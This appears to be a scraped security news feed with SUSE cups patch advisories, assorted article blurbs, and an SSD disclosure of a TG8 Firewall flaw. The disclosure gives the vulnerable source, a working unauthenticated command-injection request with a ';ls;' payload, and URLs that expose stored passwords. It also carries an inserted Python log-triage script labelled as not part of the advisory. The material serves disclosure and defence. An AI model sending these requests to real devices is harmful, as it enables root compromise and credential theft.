libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Linux Enterprise High Performance Computing 15-ESPOS (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE Enterprise Storage 6 (aarch64 x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1
o SUSE Enterprise Storage 6 (x86_64):
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
o SUSE CaaS Platform 4.0 (x86_64):
cups-2.2.7-3.26.1
cups-client-2.2.7-3.26.1
cups-client-debuginfo-2.2.7-3.26.1
cups-config-2.2.7-3.26.1
cups-ddk-2.2.7-3.26.1
cups-ddk-debuginfo-2.2.7-3.26.1
cups-debuginfo-2.2.7-3.26.1
cups-debugsource-2.2.7-3.26.1
cups-devel-2.2.7-3.26.1
libcups2-2.2.7-3.26.1
libcups2-32bit-2.2.7-3.26.1
libcups2-32bit-debuginfo-2.2.7-3.26.1
libcups2-debuginfo-2.2.7-3.26.1
libcupscgi1-2.2.7-3.26.1
libcupscgi1-debuginfo-2.2.7-3.26.1
libcupsimage2-2.2.7-3.26.1
libcupsimage2-debuginfo-2.2.7-3.26.1
libcupsmime1-2.2.7-3.26.1
libcupsmime1-debuginfo-2.2.7-3.26.1
libcupsppdc1-2.2.7-3.26.1
libcupsppdc1-debuginfo-2.2.7-3.26.1

References:

o https://www.suse.com/security/cve/CVE-2021-25317.html
o https://bugzilla.suse.com/1184161

– ——————————————————————————–

SUSE Security Update: Security update for cups

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:14712-1
Rating: important
References: #1184161
Cross-References: CVE-2021-25317
Affected Products:
SUSE Linux Enterprise Server 11-SP4-LTSS
SUSE Linux Enterprise Point of Sale 11-SP3
SUSE Linux Enterprise Debuginfo 11-SP4
SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for cups fixes the following issues:

o CVE-2021-25317: ownership of /var/log/cups could allow privilege escalation
from lp user to root via symlink attacks (bsc#1184161)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE Linux Enterprise Server 11-SP4-LTSS:
zypper in -t patch slessp4-cups-14712=1
o SUSE Linux Enterprise Point of Sale 11-SP3:
zypper in -t patch sleposp3-cups-14712=1
o SUSE Linux Enterprise Debuginfo 11-SP4:
zypper in -t patch dbgsp4-cups-14712=1
o SUSE Linux Enterprise Debuginfo 11-SP3:
zypper in -t patch dbgsp3-cups-14712=1

Package List:

o SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64):
cups-1.3.9-8.46.56.18.1
cups-client-1.3.9-8.46.56.18.1
cups-libs-1.3.9-8.46.56.18.1
o SUSE Linux Enterprise Server 11-SP4-LTSS (ppc64 s390x x86_64):
cups-libs-32bit-1.3.9-8.46.56.18.1
o SUSE Linux Enterprise Point of Sale 11-SP3 (i586):
cups-1.3.9-8.46.56.18.1
cups-client-1.3.9-8.46.56.18.1
cups-libs-1.3.9-8.46.56.18.1
o SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64):
cups-debuginfo-1.3.9-8.46.56.18.1
cups-debugsource-1.3.9-8.46.56.18.1
o SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64):
cups-debuginfo-1.3.9-8.46.56.18.1
cups-debugsource-1.3.9-8.46.56.18.1

References:

o https://www.suse.com/security/cve/CVE-2021-25317.html
o https://bugzilla.suse.com/1184161

– ——————————————————————————–

SUSE Security Update: Security update for cups

______________________________________________________________________________

Announcement ID: SUSE-SU-2021:1453-1
Rating: important
References: #1184161
Cross-References: CVE-2021-25317
Affected Products:
SUSE OpenStack Cloud Crowbar 9
SUSE OpenStack Cloud Crowbar 8
SUSE OpenStack Cloud 9
SUSE OpenStack Cloud 8
SUSE Linux Enterprise Software Development Kit 12-SP5
SUSE Linux Enterprise Server for SAP 12-SP4
SUSE Linux Enterprise Server for SAP 12-SP3
SUSE Linux Enterprise Server 12-SP5
SUSE Linux Enterprise Server 12-SP4-LTSS
SUSE Linux Enterprise Server 12-SP3-LTSS
SUSE Linux Enterprise Server 12-SP3-BCL
SUSE Linux Enterprise Server 12-SP2-LTSS-SAP
SUSE Linux Enterprise Server 12-SP2-LTSS-ERICSSON
SUSE Linux Enterprise Server 12-SP2-BCL
HPE Helion Openstack 8
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for cups fixes the following issues:

o CVE-2021-25317: ownership of /var/log/cups could allow privilege escalation
from lp user to root via symlink attacks (bsc#1184161)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or “zypper patch”.
Alternatively you can run the command listed for your product:

o SUSE OpenStack Cloud Crowbar 9:
zypper in -t patch SUSE-OpenStack-Cloud-Crowbar-9-2021-1453=1
o SUSE OpenStack Cloud Crowbar 8:
zypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2021-1453=1
o SUSE OpenStack Cloud 9:
zypper in -t patch SUSE-OpenStack-Cloud-9-2021-1453=1
o SUSE OpenStack Cloud 8:
zypper in -t patch SUSE-OpenStack-Cloud-8-2021-1453=1
o SUSE Linux Enterprise Software Development Kit 12-SP5:
zypper in -t patch SUSE-SLE-SDK-12-SP5-2021-1453=1
o SUSE Linux Enterprise Server for SAP 12-SP4:
zypper in -t patch SUSE-SLE-SAP-12-SP4-2021-1453=1
o SUSE Linux Enterprise Server for SAP 12-SP3:
zypper in -t patch SUSE-SLE-SAP-12-SP3-2021-1453=1
o SUSE Linux Enterprise Server 12-SP5:
zypper in -t patch SUSE-SLE-SERVER-12-SP5-2021-1453=1
o SUSE Linux Enterprise Server 12-SP4-LTSS:
zypper in -t patch SUSE-SLE-SERVER-12-SP4-LTSS-2021-1453=1
o SUSE Linux Enterprise Server 12-SP3-LTSS:
zypper in -t patch SUSE-SLE-SERVER-12-SP3-2021-1453=1
o SUSE Linux Enterprise Server 12-SP3-BCL:
zypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2021-1453=1
o SUSE Linux Enterprise Server 12-SP2-LTSS-SAP:
zypper in -t patch SUSE-SLE-SERVER-12-SP2-LTSS-SAP-2021-1453=1
o SUSE Linux Enterprise Server 12-SP2-LTSS-ERICSSON:
zypper in -t patch SUSE-SLE-SERVER-12-SP2-LTSS-ERICSSON-2021-1453=1
o SUSE Linux Enterprise Server 12-SP2-BCL:
zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2021-1453=1
o HPE Helion Openstack 8:
zypper in -t patch HPE-Helion-OpenStack-8-2021-1453=1

Package List:

o SUSE OpenStack Cloud Crowbar 9 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE OpenStack Cloud Crowbar 8 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE OpenStack Cloud 9 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE OpenStack Cloud 8 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Software Development Kit 12-SP5 (aarch64 ppc64le
s390x x86_64):
cups-ddk-1.7.5-20.36.1
cups-ddk-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-devel-1.7.5-20.36.1
o SUSE Linux Enterprise Server for SAP 12-SP4 (ppc64le x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server for SAP 12-SP4 (x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server for SAP 12-SP3 (ppc64le x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server for SAP 12-SP3 (x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP5 (aarch64 ppc64le s390x x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP5 (s390x x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP4-LTSS (aarch64 ppc64le s390x x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP4-LTSS (s390x x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP3-LTSS (aarch64 ppc64le s390x x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP3-LTSS (s390x x86_64):
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP3-BCL (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP2-LTSS-SAP (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP2-LTSS-ERICSSON (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1
o HPE Helion Openstack 8 (x86_64):
cups-1.7.5-20.36.1
cups-client-1.7.5-20.36.1
cups-client-debuginfo-1.7.5-20.36.1
cups-debuginfo-1.7.5-20.36.1
cups-debugsource-1.7.5-20.36.1
cups-libs-1.7.5-20.36.1
cups-libs-32bit-1.7.5-20.36.1
cups-libs-debuginfo-1.7.5-20.36.1
cups-libs-debuginfo-32bit-1.7.5-20.36.1

References:

o https://www.suse.com/security/cve/CVE-2021-25317.html
o https://bugzilla.suse.com/1184161

– ————————–END INCLUDED TEXT——————–



The post ESB-2021.1492 – [Win][UNIX/Linux][SUSE] cups: Root compromise – Existing account appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/esb-2021-1492-winunix-linuxsuse-cups-root-compromise-existing-account/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2021-1492-winunix-linuxsuse-cups-root-compromise-existing-account

How to Solve the Cybersecurity Skills Gap

Understanding how to bridge the talent gap in the cybersecurity industry requires thinking beyond traditional approaches to recruiting. While there’s been progress, there is still room for organizations to evolve, which will require not only changing the way they think about hiring but the way hiring managers communicate with human resources. Yet many organizations continue..

The post How to Solve the Cybersecurity Skills Gap appeared first on Security Boulevard.


The post How to Solve the Cybersecurity Skills Gap appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/how-to-solve-the-cybersecurity-skills-gap/?utm_source=rss&utm_medium=rss&utm_campaign=how-to-solve-the-cybersecurity-skills-gap

Shlayer Strikes Again Through Zero-Day in MacOS 11.3

Apple this week revealed that its new macOS 11.3 update comes with a fix for a critical vulnerability – one that hackers actively exploited with Shlayer malware that can sidestep Apple defenses. The zero-day flaw, first discovered in March but likely in use by hackers since Jan. 9, allows unapproved software to run on Mac..

The post Shlayer Strikes Again Through Zero-Day in MacOS 11.3 appeared first on Security Boulevard.


The post Shlayer Strikes Again Through Zero-Day in MacOS 11.3 appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/shlayer-strikes-again-through-zero-day-in-macos-11-3/?utm_source=rss&utm_medium=rss&utm_campaign=shlayer-strikes-again-through-zero-day-in-macos-11-3

SSD Advisory – TG8 Firewall PreAuth RCE and Password Disclosure

TL;DR

Find out how vulnerabilities in TG8 Firewall allow remote unauthenticated users to execute arbitrary code on the remote device as well as disclose the passwords of existing accounts.

Vulnerability Summary

Two security vulnerabilities have been found in TG8 Firewall. The first allows a remote user to execute commands as the root user without needing to authenticate with the device or have any privileged access; the second exposes existing users’ passwords without being authenticated with the remote device.

CVE

Pending

Credit

An independent security researcher has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions
TG8 Firewall

Vendor Response

Numerous attempts to contact the vendor via Twitter, Facebook and email have not triggered any response from the vendor. We urge customers of this product to immediately block the internet-facing ports 80/443 used for administering the device – it can be easily compromised.

Vulnerability Analysis

PreAuth RCE

The vulnerability lies in the way the authentication request is handled, which leads to remote command execution with root user privileges. The data passed via the user and password parameters is used directly as an argument of a Linux command, which allows command execution.

index.php source code

If you examine the index.php file, you will notice that it calls runphpcmd.php with a value of 'sudo /home/TG8/v3/syscmd/check_gui_login.sh ' + username + ' ' + pass. This is very strange and very unusual, but what you should immediately notice is that it is basically calling a command prefixed with sudo and examining the response to that command.

Obviously, if we change the cmd being called we can theoretically execute any command, but let's first verify what runphpcmd.php does, as it may be filtering or limiting what commands can be run:


function checkLogin() {
    var username = $('input[name=u]').val();
    var pass = $('input[name=p]').val();
    var cmd = 'sudo /home/TG8/v3/syscmd/check_gui_login.sh ' + username + ' ' + pass;
    $.ajax({
        url: "runphpcmd.php",
        type: "post",
        dataType: "json",
        cache: "false",
        data: {
            syscmd: cmd
        },
        success: function (x) {
            if (x == 'OK') {
                ok(username);
            } else {
                failed();
            }
        },
        error: function () {
            ok(username);
            // alert("failure to excute the command");
        }
    })
}

runphpcmd.php source code

As can be seen in the source code of runphpcmd.php, there is no verification of what syscmd is running, and the outcome is returned in JSON format to the caller of this file:

<?php
header('Content-Type: application/json');
$response= array();
$output= array();
$cmd_1 = $_POST['syscmd'];
$data = 'cmd= '.$cmd_1."\n";
$fp = fopen('/opt/phpJS.log', 'a');
fwrite($fp, $data);
exec($cmd_1,$output,$ret);
$data = ' output ='. json_encode($output)."\n*******************************************************\n";
$fp = fopen('/opt/phpJS.log', 'a');
fwrite($fp, $data);
$response[] = array("result" => $output);
// Encoding array in JSON format
echo json_encode($output);
?>

Exploit

POST http://<server>/admin/runphpcmd.php HTTP/1.1
Host: Server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: keep-alive

syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+<command here>++local

The value passed via the syscmd parameter is not sanitized, which leads to RCE.

Example: the ls command is executed in the request below. Payload: ;ls;

syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bls%3B++local

The response to the above request will contain the result of the command execution.
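For triage of a device that may already have been reached this way: runphpcmd.php appends every syscmd value and its output to /opt/phpJS.log, so that file records each command the endpoint ran. The following is an added example, not part of the advisory or the vendor's code; it parses that log layout as written by the PHP source above and flags records that are not a plain login check. The sample log, the metacharacter set and all function names are assumptions constructed for illustration.

```python
import json
from dataclasses import dataclass

# Command prefix that index.php builds for every legitimate login attempt (from the advisory).
LOGIN_PREFIX = "sudo /home/TG8/v3/syscmd/check_gui_login.sh "
# Characters /bin/sh treats specially (assumed set); exec() passes the whole string to the shell.
SHELL_META = set(";&|`$<>(){}\\\n'\"*?!#~")


@dataclass
class Entry:
    line_no: int   # 1-based line on which "cmd= " was written
    command: str   # raw value of the syscmd POST parameter
    output: list   # decoded JSON array returned by exec(), [] if missing


def parse_log(text):
    """Split phpJS.log text into Entry records.

    A record starts at 'cmd= ', may span several lines when the command
    contained newlines, and ends at the ' output =' line written after exec().
    """
    entries, current = [], None
    for no, line in enumerate(text.splitlines(), start=1):
        if line.startswith("cmd= "):
            if current:
                entries.append(current)          # previous record has no output line
            current = Entry(no, line[len("cmd= "):], [])
        elif line.startswith(" output =") and current:
            try:
                current.output = json.loads(line[len(" output ="):])
            except ValueError:
                current.output = []              # truncated or corrupted output line
            entries.append(current)
            current = None
        elif current:
            current.command += "\n" + line       # continuation of a multi-line command
    if current:
        entries.append(current)
    return entries


def classify(entry):
    """Return 'login', 'shell-metachar' or 'foreign-command' for one record."""
    if not entry.command.startswith(LOGIN_PREFIX):
        return "foreign-command"                 # endpoint ran something other than the login check
    args = entry.command[len(LOGIN_PREFIX):]
    if any(ch in SHELL_META for ch in args):
        return "shell-metachar"                  # arguments the shell will interpret, not pass through
    return "login"


def redact(entry, verdict):
    """Hide the password of well-formed login records: the log stores it in cleartext."""
    if verdict != "login":
        return entry.command
    user = entry.command[len(LOGIN_PREFIX):].split(" ", 1)[0]
    return f"{LOGIN_PREFIX}{user} <redacted>"


def triage(text):
    """Return (line_no, verdict, command, output_line_count) for each suspicious record."""
    findings = []
    for entry in parse_log(text):
        verdict = classify(entry)
        if verdict != "login":
            findings.append((entry.line_no, verdict, entry.command, len(entry.output)))
    return findings


# Constructed sample in the layout runphpcmd.php writes; values are illustrative only.
SAMPLE_LOG = (
    "cmd= sudo /home/TG8/v3/syscmd/check_gui_login.sh admin Example-Pass1\n"
    ' output =["OK"]\n'
    "*******************************************************\n"
    "cmd= sudo /home/TG8/v3/syscmd/check_gui_login.sh ;ls;  local\n"
    ' output =["index.php","runphpcmd.php"]\n'
    "*******************************************************\n"
    "cmd= /bin/example-other-command\n"
    " output =[]\n"
    "*******************************************************\n"
)

if __name__ == "__main__":
    for entry in parse_log(SAMPLE_LOG):
        verdict = classify(entry)
        print(entry.line_no, verdict, redact(entry, verdict))
```

A password that legitimately contains one of the flagged characters is reported as well; that is intended, since the shell interprets it the same way.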

Password Disclosure

The /data/ folder, which is insecurely accessible to remote unauthenticated users, stores the credentials of previously logged-on users. Since this folder doesn’t require any special access, enumerating the files located under it can be used to reveal accounts present on the TG8 Firewall.

Example URLs:

http://<server>/data/w-341.tg
http://<server>/data/w-342.tg
http://<server>/data/r-341.tg
http://<server>/data/r-342.tg

The post SSD Advisory – TG8 Firewall PreAuth RCE and Password Disclosure appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure/?utm_source=rss&utm_medium=rss&utm_campaign=ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure

Remembering Dan Kaminsky, Apple AirDrop Vulnerability

Remembering Dan Kaminsky who was one of the greatest security researchers of our time plus details on a new Apple Airdrop vulnerability. ** Links mentioned on the show ** Remembering Dan Kaminsky https://www.nytimes.com/2021/04/27/technology/daniel-kaminsky-dead.html Apple AirDrop Bug Could Leak Your Personal Info to Anyone Nearby https://thehackernews.com/2021/04/apple-airdrop-bug-could-leak-your.html https://www.komando.com/security-privacy/apple-airdrop-security-flaw/787628/ ** Watch this episode on YouTube ** https://youtu.be/N6T6qcRfTBA ** […]

The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on The Shared Security Show.

The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on Security Boulevard.


The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/remembering-dan-kaminsky-apple-airdrop-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=remembering-dan-kaminsky-apple-airdrop-vulnerability

3 Best Practices for Customizing Your Compliance Program

Most large-scale entities need to prove compliance with multiple regulatory standards. In their efforts to meet their compliance mandates, organizations could suffer a major drain on their time and resources. This possibility holds true regardless of whether they’re finance companies, retailers, manufacturers or hospitality firms. Organizations face an additional obstacle when they have an internally […]…

The post 3 Best Practices for Customizing Your Compliance Program appeared first on The State of Security.

The post 3 Best Practices for Customizing Your Compliance Program appeared first on Security Boulevard.


The post 3 Best Practices for Customizing Your Compliance Program appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/3-best-practices-for-customizing-your-compliance-program/?utm_source=rss&utm_medium=rss&utm_campaign=3-best-practices-for-customizing-your-compliance-program

6 Steps To Improve Your Data Security and Data Compliance

Data privacy has been a hot topic in the tech world for years now. With every new technology come new regulations that require companies to completely re-examine the way they handle private data. Most companies already have a basic data privacy policy they constructed alongside lawyers and tech experts to avoid facing serious fines and […]…

The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on The State of Security.

The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on Security Boulevard.


The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/6-steps-to-improve-your-data-security-and-data-compliance/?utm_source=rss&utm_medium=rss&utm_campaign=6-steps-to-improve-your-data-security-and-data-compliance

ISC Stormcast For Monday, May 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7482, (Mon, May 3rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The post ISC Stormcast For Monday, May 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7482, (Mon, May 3rd) appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/isc-stormcast-for-monday-may-3rd-2021-https-isc-sans-edu-podcastdetail-htmlid7482-mon-may-3rd/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-monday-may-3rd-2021-https-isc-sans-edu-podcastdetail-htmlid7482-mon-may-3rd

FIPAC: Thwarting Fault- and Software-Induced Control-Flow Attacks with ARM Pointer Authentication


The post FIPAC: Thwarting Fault- and Software-Induced Control-Flow Attacks with ARM Pointer Authentication appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/fipac-thwarting-fault-and-software-induced-control-flow-attacks-with-arm-pointer-authentication/?utm_source=rss&utm_medium=rss&utm_campaign=fipac-thwarting-fault-and-software-induced-control-flow-attacks-with-arm-pointer-authentication

A comparative study of neural network techniques for automatic software vulnerability detection


The post A comparative study of neural network techniques for automatic software vulnerability detection appeared first on Malware Devil.



https://malwaredevil.com/2021/05/03/a-comparative-study-of-neural-network-techniques-for-automatic-software-vulnerability-detection/?utm_source=rss&utm_medium=rss&utm_campaign=a-comparative-study-of-neural-network-techniques-for-automatic-software-vulnerability-detection

Sunday, May 2, 2021

Six things you have to know about ITAR compliance

  International Traffic in Arms Regulations (ITAR) is a set of regulations administered by the State Department to control the export of defense and military related technologies. The goal of the legislation is to control access to specific types of technology and their associated data by our country’s enemies.   Any U.S. company, research lab […]

The post Six things you have to know about ITAR compliance appeared first on PreVeil.

The post Six things you have to know about ITAR compliance appeared first on Security Boulevard.


The post Six things you have to know about ITAR compliance appeared first on Malware Devil.



https://malwaredevil.com/2021/05/02/six-things-you-have-to-know-about-itar-compliance/?utm_source=rss&utm_medium=rss&utm_campaign=six-things-you-have-to-know-about-itar-compliance

PuTTY And FileZilla Use The Same Fingerprint Registry Keys, (Sun, May 2nd)

Many SSH clients can remember SSH servers’ fingerprints. This can serve as a safety mechanism: you get a warning when the server you want to connect to no longer has the same fingerprint. And then you can decide what to do: continue with the connection, or stop and try to figure out what is going on.

This happened to me a couple of months ago. I wanted to transfer some files over SSH with FileZilla, and received a prompt that the server I usually connect to, had an unknown fingerprint. I did not go through with the connection, and started to investigate what was going on.

Long story short: I had removed SSH fingerprints cached by PuTTY in the Windows registry, and this impacted FileZilla: both use the same registry keys for their fingerprint cache.

You can see the registry keys here in FileZilla’s source code:

If you do forensics on Windows machines, be aware that these registry keys are not only used by PuTTY, but also by FileZilla’s fzsftp.exe module.

I have more details here if you are interested.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The post PuTTY And FileZilla Use The Same Fingerprint Registry Keys, (Sun, May 2nd) appeared first on Malware Devil.



https://malwaredevil.com/2021/05/02/putty-and-filezilla-use-the-same-fingerprint-registry-keys-sun-may-2nd/?utm_source=rss&utm_medium=rss&utm_campaign=putty-and-filezilla-use-the-same-fingerprint-registry-keys-sun-may-2nd

Curo/bin

This post wraps up another Twitter thread I started a few days ago: If you ever get bored using “copy” to copy files you can always use … curl: curl […]

The post Curo/bin appeared first on Malware Devil.



https://malwaredevil.com/2021/05/02/curo-bin/?utm_source=rss&utm_medium=rss&utm_campaign=curo-bin

Throwing LOLBIN a tar ball

This post summarizes some of the findings I posted on Twitter the other day. While looking at Windows version of tar.exe I discovered that it includes lots of undocumented command […]

The post Throwing LOLBIN a tar ball appeared first on Malware Devil.



https://malwaredevil.com/2021/05/02/throwing-lolbin-a-tar-ball/?utm_source=rss&utm_medium=rss&utm_campaign=throwing-lolbin-a-tar-ball

Gup o/ bin

Notepad ++ comes with a built-in Updater called GUP typically located here: c:\Program Files (x86)\Notepad++\updater\GUP.exe It is a generic downloader that accepts a range of command line arguments, and while […]

The post Gup o/ bin appeared first on Malware Devil.



https://malwaredevil.com/2021/05/02/gup-o-bin/?utm_source=rss&utm_medium=rss&utm_campaign=gup-o-bin

FTP.EXE Lolbin v2

@0gtweet’s tweet inspired me to look at lolbin stuff again (as it is often the case). So… everyone knows we can use ftp.exe as a lolbin and using COMSPEC trick […]

The post FTP.EXE Lolbin v2 appeared first on Malware Devil.



https://malwaredevil.com/2021/05/02/ftp-exe-lolbin-v2/?utm_source=rss&utm_medium=rss&utm_campaign=ftp-exe-lolbin-v2

